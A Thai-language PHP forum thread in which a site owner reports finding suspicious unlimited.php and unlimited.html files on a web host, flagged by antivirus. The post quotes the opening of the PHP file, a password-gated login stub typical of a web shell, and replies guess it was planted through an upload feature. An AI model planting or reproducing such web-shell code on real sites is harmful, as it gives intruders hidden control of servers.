Forgot Password ??

PHP , ASP , ASP.NET, VB.NET, C#, Java , jQuery , Android , iOS , Windows Phone

	Registered : 109,027

HOME > PHP > PHP Forum > ในโฮสต์เจอไฟล์ unlimited.php ในโฟลด์เดอร์บางตัวมีไฟล์ชื่อนี้อยู่ ดูในโค้ดเจอ by weetoole.com มันคือไฟล์ไรครับ น่าจะมีผู้บุกรุก

ในโฮสต์เจอไฟล์ unlimited.php ในโฟลด์เดอร์บางตัวมีไฟล์ชื่อนี้อยู่ ดูในโค้ดเจอ by weetoole.com มันคือไฟล์ไรครับ น่าจะมีผู้บุกรุก

เริ่มหัวข้อใหม่

gobi

โพสกระทู้ ( 99 )
บทความ ( 0 )

พอดีเจอมีทั้ง .php และ .html

ในไฟล์ php มีโค้ดแบบนี้

Code

<?php 
@session_start();
@set_time_limit(0);
 
@$pass = md5(trim($_POST['pass']));
$chk_login = 1;
$password =  "253614bbac999b38b5b60cae531c4969";  
 
if($pass == $password)
{
 $_SESSION['ses'] = "$pass";
}
 
if($chk_login)
{
 if(!isset($_SESSION['ses']) or $_SESSION['ses'] != $password)
 {
 die("

มีตัวอักษรแปลก ต่อท้าย ผมโพสต์ลงในนี้ไม่ได้ ไทยครีเอทแจ้งว่า spam

Tag : PHP, MySQL

Date : 2015-01-26 23:02:58

By : ฟงหวินขี่เครื่องสูบน้ำท้าลมหนาว

View : 730

Reply : 3

No. 1

meannerss

โพสกระทู้ ( 1,666 )
บทความ ( 0 )

ในเว็บมี ช่องให้อัพโหลดรูปภาพ/ไฟล์รึเปล่าครับ.. พวกนี้ที่เคยเจอแอบเนียนมากับพวก text editor .. ปุ่มแทรกภาพ/ไฟล์ แล้วอัพโหลดเข้าโฮสเรา นี่ไม่ไช่ของดีเลยนะ ไม่จำเป็นอย่าใส่ ให้เขาไปหาฝากแล้วดึง url เอาดีกว่า

Date : 2015-01-27 00:02:18

By : meannerss

No. 2

TC Admin

โพสกระทู้ ( 74,058 )
บทความ ( 838 )

สงสัยเอาไว้ Hack ด้วยกอัพโหลดไฟล์ แล้วก็ใช้พวก File Browse ไว้แก้ไขหรือดูไฟล์แน่นอนครับ

Date : 2015-01-27 09:28:01

By : mr.win

No. 3

gobi

โพสกระทู้ ( 99 )
บทความ ( 0 )

ผมไม่รู้ว่าไฟล์พวกนี้ทำให้ spam เต็มไปหมดในฐานข้อมูลหรือเปล่านะครับ เพราะเว็บบอร์ดผมป้องกันด้วยการให้เฉพาะสมาชิกโพสต์ แต่มันก็ยังมีตัวหนังสือแปลกๆ อยู่ในฐานข้อมูล แล้วก็ลบอาทิตย์ละครั้งซึ่งเยอะมาก

พอดีผม backup site ไว้ ตอน backup มันวิ่งไปเจอไฟ์ที่ชื่อ unlimited.php, unlimited.html ซึ่งขึ้นสีแดงและ nod 32 ก็ขึ้นแดงด้วย ก็เลยเอะใจว่า ไฟล์นี้มันมีอยู่ใน site หรอ เพราะไฟล์มันเยอะกลัวตัวเองจำไม่ได้ เลยเข้าไปดูข้างในปรากฏว่า โค้ดอะไรไม่รู้แปลกๆ เต็มไปหมด

Date : 2015-01-27 14:33:52

By : ฟงหวินขี่เครื่องสูบน้ำท้าลมหนา

ค้นหาข้อมูล

แสดงความคิดเห็น

Re : ในโฮสต์เจอไฟล์ unlimited.php ในโฟลด์เดอร์บางตัวมีไฟล์ชื่อนี้อยู่ ดูในโค้ดเจอ by weetoole.com มันคือไฟล์ไรครับ น่าจะมีผู้บุกรุก

รายละเอียด

เพื่อความเรียบร้อยของข้อความ ควรจัดรูปแบบให้พอดีกับขนาดของหน้าจอ เพื่อง่ายต่อการอ่านและสบายตา และตรวจสอบภาษาไทยให้ถูกต้อง

อัพโหลดแทรกรูปภาพ

Notice

เพื่อความปลอดภัยของเว็บบอร์ด ไม่อนุญาติให้แทรก แท็ก [img]....[/img] โดยการอัพโหลดไฟล์รูปจากที่อื่น เช่นเว็บไซต์ ฟรีอัพโหลดต่าง ๆ
อัพโหลดแทรกรูปภาพ ให้ใช้บริการอัพโหลดไฟล์ของไทยครีเอท และตัดรูปภาพให้พอดีกับสกรีน เพื่อความโหลดเร็วและไฟล์ไม่ถูกลบทิ้ง

เพื่อความปลอดภัยและการตรวจสอบ กระทู้ที่แทรกไฟล์อัพโหลดไฟล์จากที่อื่น อาจจะถูกลบทิ้ง

โดย

อีเมล์

บวกค่าให้ถูก

<= ตัวเลขฮินดูอารบิก เช่น 123 (หรือล็อกอินเข้าระบบสมาชิกเพื่อไม่ต้องกรอก)

Exchange: นำเข้าสินค้าจากจีน, Taobao, เฟอร์นิเจอร์, ของพรีเมี่ยม, ร่ม, ปากกา, power bank, แฟลชไดร์ฟ, กระบอกน้ำ